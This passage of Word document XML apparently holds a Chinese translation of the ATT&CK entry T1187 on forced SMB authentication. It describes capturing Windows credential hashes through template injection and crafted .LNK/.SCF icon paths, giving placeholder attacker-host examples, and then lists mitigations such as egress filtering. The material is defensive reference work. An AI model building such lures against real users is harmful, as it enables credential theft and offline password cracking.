          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B220781" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强制认证</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="710DA668" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4386C817" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> T1187</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24B6E73C" w14:textId="6EFA27B4" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D1AA36" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="617BA30C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F2ADD7F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，网络协议分析，网络设备日志，进程使用网络</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A803EAF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t>: Teodor Cimpoesu; Sudhanshu Chauhan, @Sudhanshu_C</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F1887A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33B5C7D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FBF3CEB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>服务器消息块（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）协议通常用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络中，用于系统之间的身份验证和通信，以访问资源和文件共享。当</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统尝试连接到</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源时，它将自动尝试进行身份验证，并将当前用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息发送到远程系统。此行为在企业环境中很常见，因此用户无需输入凭据即可访问网络资源。当</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被阻止或失败时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式创作和版本控制（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）通常被</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统用作备份协议。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的扩展，通常在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4690F2B7" w14:textId="55E578B3" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以利用此行为通过强制</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份验证访问用户帐户哈希。攻击者可以通过鱼叉式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钓鱼</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向用户发送附件，其中包含指向对手控制的外部服务器的资源链接（即模板注入），或者将特制文件放置在特权帐户的导航路径上（例如放在桌面上的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.SCF</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0293D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或受害者可以访问的可公开访问的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源。</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当用户系统访问不受信任的资源时，它将尝试进行身份验证，并通过</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向用户控制的服务器发送包括用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份验证哈希值</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息。通过访问</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希，攻击者可以执行离线暴力破解以获取纯文本</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者将其重新用于传递哈希。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BC2D2C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="6B1DD0E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上情况可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几种不同的方式发生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId151" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>[6]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in-the-wild </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些细节包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E3A7D9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含文档的鱼叉式钓鱼附件，该文档具有在打开文档时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动加载的资源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（即</w:t>
      </w:r>
      <w:r w:rsidRPr="004779E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，该文档可以包括类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>file[:]//[remote address]/Normal.dotm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的请求以触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AB14C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.LNK</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.SCF</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，其图标文件名指向外部引用，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>\[remote address]\pic.png</w:t>
      </w:r>
      <w:r w:rsidRPr="00F63BB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这将强制系统在呈现图标时加载资源以重复收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份验证信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F484A17" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1976"/>
        <w:gridCol w:w="7760"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="004779E1" w14:paraId="55A43AEF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="234F389D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7760" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="313B93DC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="1B18C54B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1875BEC4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤网络流量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="782413CE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用出口过滤或阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>TCP</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>端口</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>139,445</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UDP</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>端口</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>137</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量流出企业网络。过滤或阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WebDAV</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>协议流量流出网络。</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果需要通过</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WebDAV</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>访问外部资源，则应通过白名单严格限制流量。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="37EA31A9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="205580AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>密码策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7760" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B3629B1" w14:textId="3F1967DD" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用强密码可以增加</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>哈希在获得时被破解的难度。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E7FE960" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
